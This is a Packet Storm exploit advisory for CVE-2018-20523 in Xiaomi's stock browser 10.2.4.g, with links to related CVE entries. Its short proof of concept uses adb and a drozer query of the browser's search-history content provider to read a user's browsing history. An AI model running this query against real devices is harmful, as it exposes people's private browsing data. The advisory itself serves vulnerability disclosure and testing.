Lucene search
Vishwaraj101PACKETSTORM:163796HistoryAug 12, 2021 - 12:00 a.m.
Xiaomi 10.2.4.g Information Disclosure
2021-08-1200:00:00
Vishwaraj101
packetstormsecurity.com
231
xiaomi
browser
search history
disclosure
content provider
injection
cve-2018-20523
android
redmi note 5 pro
EPSS
0.012
Percentile
85.2%
`# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
# Date: 27-Dec-2018
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.mi.com/us
# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
# Version: 10.2.4.g
# Tested on: Tested in Android Version: 8.1.0
# CVE : CVE-2018-20523
*summary: *
Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the userβs browser history.
*Vulnerable component:* com.android.browser.searchhistory
*Poc:*
adb forward tcp:31415 tcp:31415
drozer console connect
drozer > run app.provider.query
content://com.android.browser.searchhistory/searchhistory
*Blogpost:*
https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/
`
Related
cvelist
cvelist
CVE-2018-20523
2019-06-07 15:36:55
exploitdb
exploitdb
Xiaomi browser 10.2.4.g - Browser Search History Disclosure
2021-08-10 00:00:00
prion
prion
Design/Logic Flaw
2019-06-07 16:29:00
nvd
nvd
CVE-2018-20523
2019-06-07 16:29:00
cve
cve
CVE-2018-20523
2019-06-07 16:29:00
zdt
zdt
Xiaomi browser 10.2.4.g - Browser Search History Disclosure Vulnerability
2021-08-10 00:00:00